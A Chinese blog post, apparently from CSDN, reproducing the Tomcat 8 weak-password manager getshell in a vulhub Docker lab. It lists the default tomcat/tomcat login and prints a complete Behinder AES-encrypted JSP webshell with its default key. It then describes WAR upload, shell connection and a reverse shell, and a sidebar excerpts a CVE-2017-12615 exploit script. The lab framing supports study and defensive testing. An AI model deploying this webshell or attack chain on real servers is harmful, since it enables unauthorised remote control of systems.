Tomcat8 + 弱口令 && 后台getshell 漏洞复现

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: tomcat 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119521219
版权

Tomcat8 + 弱口令 && 后台getshell 漏洞复现

文章目录

环境开启

启动docker开启镜像环境

vulhub镜像中的tomcat8文件目录下,docker-compose up -d

image-20210808170540457

成功在主机上访问到

image-20210808170703568

漏洞复现

根据弱密码tomcat/tomcat登陆管理后台

或者使用tomcat爆破工具

image-20210808204315275

在下面位置可以找到上传点

image-20210808204424187

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

上传对应的war文件,先把冰蝎jsp马保存到zip压缩包中,再修改后缀名为war上传。可以看到上传成功

image-20210808204830123

在manager/satus可以看到服务器状态

image-20210808205008063

冰蝎连接

image-20210808205309475

连接成功

image-20210808205400625

上传jsp大马反弹shell

image-20210808210458014

修改对应主机ip

image-20210808210133503

开启监听对应窗口

image-20210808210220615上传

然后点击send进行命令控制

image-20210808210618616

详情请看这个博客:https://idc.wanyunshuju.com/aqld/2005.html

yyyyzzzllll
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
tomcat8 后台getshell漏洞复现
weixin_54786196的博客
09-03 253
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
用JSP求1~10的阶乘
baidu_38958878的博客
05-28 9912
pageEncoding="UTF-8"%> Insert title here     int a=1;   for(int i=1;i %>        } %> for(int i=1;i   { a=a*i; %>          } %>
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1168
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
Tomcat任意文件上传CVE-2017-12615漏洞JSP利用脚本
zhlhely的博客
09-27 577
#! -*- coding:utf-8 -*- import requests import sys body = ''' <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try...
漏洞复现(vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 721
vulhub上的tomcat弱口令漏洞
Tomcat7_weakpasswd 弱口令 漏洞复现
ADummy的博客
02-04 765
Tomcat 7 +弱口令 by ADummy 0x00利用路线 ​ tomcat弱口令登录后台—>后台具有上传文件的功能—>上传木马—>getshell 0x01漏洞介绍 ​ Apache+Tomcat是很常用的网站解决方案,Apache用于提供web服务,而Tomcat是Apache服务器的扩展,用于运行jsp页面和servlet。Tomcat有一个后台管理界面,使用具有权限的用户登录后台,可上传war包(webshell)部署到web目录下。getshell 0x02前置知识
Tomcat 漏洞复现笔记
未完成的歌~的博客
03-19 5878
Tomcat 简介 Tomcat 是一个开源的轻量级 Web 应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试 Java 程序的首选。 实际上 Tomcat 是 Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行 tomcat 时,它实际上作为一个与 Apache 独立的进程单独运行的。 Apache 为 HTML 页面服务,Tomcat 主要运行 JSP 页面和 Servlet。另外,Tomcat 和 IIS 等 Web 服务器一样,具有处理 HTML 页面的.
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
jdk8+tomcat8.5+maven
06-16
jdk8+tomcat8.5+maven
Apache Tomcat后台弱口令扫描
12-11
Apache Tomcat后台弱口令扫描
jdk8+tomcat9.rar
07-05
标题“jdk8+tomcat9.rar”表明这是一个包含Java Development Kit (JDK) 8和Apache Tomcat 9服务器的压缩文件。这个压缩包可能是为了方便用户在同一环境中快速搭建Java Web开发和运行平台。 JDK8是Java编程语言的一...
tomcat8最新版本_Tomcat 又爆出高危漏洞!!Tomcat 8.5 10 中招…
weixin_39774905的博客
12-10 1476
Java技术栈www.javastack.cn关注阅读更多优质文章开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评为 OWASP 10 大安全漏洞之一。光这半年以来,栈长知道的,通过公众号Java技术栈发布的就有 Dubbo、FastJSON、Tomc...
记一次tomcat漏洞修复补丁升级
热门推荐
shipaiYang的博客
05-26 2万+
tomcat安全漏洞,现在用的版本是tomcat8.5.3。 其中有一个漏洞描述是这样子的:Apache Tomcat Security Manager 安全限制绕过漏洞(CVE-2016-5018)(其它的可以参照这个解决) 绿盟给的建议是: 有两个解决方案,一是直接升级到高版本或是打漏洞补丁。之前打过补丁但后来发现方法是错的,最后是以升级到高版本解决问题的。 升级到高版本的方法,...
Tomcat漏洞修复纪实
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-25 6697
Tomcat漏洞修复纪实 【事件描述】 最新集团扫描出一堆安全漏洞,要求限期整改,现场环境实际用的时候Apache Tomcat/7.0.94,漏洞见下图: 【漏洞修复评估】 1、漏洞修复补丁官网: http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-8.html http://tomcat.apa...
Tomcat高危漏洞修复说明(CNTA-2020-0004)
影子的博客
02-26 2383
一、 漏洞详情 漏洞报告:https://www.cnvd.org.cn/flaw/show/CNVD-2020-10487 漏洞代码分析:https://mp.weixin.qq.com/s/SWKbpOHCyK7ZPc6AokaHGw 安全公告编号:CNTA-2020-0004 二、 漏洞危害 攻击者可利用该高危漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:weba...
Apache Tomcat安全漏洞列表及整改建议合集
story-xu的博客
08-08 1万+
描述: 安全整改目前已经成为安全运维工程师必备的技能之一,但是令人头疼的是,经常会应为一些整改问题,百度无数次,并且不知道标准是什么。下面就为大家总结了在近期web漏洞整改中,绿盟给出的漏洞报告及整改建议,方便大家参考与查找。 问题列表及整改建议列表: ...
Tomcat 爆出高危漏洞修复
Happy Simon
03-13 6142
今天跟大家分享Tomcat 爆出高危漏洞修复的知识。 1 Tomcat 爆出高危漏洞修复 1.1 漏洞背景 2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsyste...
Tomcat弱口令利用及防范
我还在的博客
10-24 6593
Tomcat弱口令利用及防范0x00 前言0x01 环境拓扑0x02 攻击过程 0x00 前言 Apache+Tomcat是很常用的网站解决方案,Apache用于提供web服务,而Tomcat是Apache服务器的扩展,用于运行jsp页面和servlet。Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经...
tomcat弱口令复现
09-23
Tomcat的管理后台可以通过在Tomcat安装目录下的conf/tomcat-users.xml文件中配置用户名和密码来进行访问。然而,由于管理员为了方便经常使用弱口令,这就导致了Tomcat存在弱口令的安全风险。当Tomcat后台管理用户存在弱口令时,攻击者可以利用这个漏洞来上传webshell并实施攻击。 要复现Tomcat弱口令漏洞,可以按照以下步骤进行操作: 1. 找到Tomcat安装目录下的conf/tomcat-users.xml文件。 2. 使用文本编辑器打开tomcat-users.xml文件。 3. 查找并找到带有用户名和密码的<user>元素。 4. 确认用户名和密码是否为弱口令,例如“admin/admin”。 5. 如果发现弱口令,请及时修改密码,确保使用强密码来提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值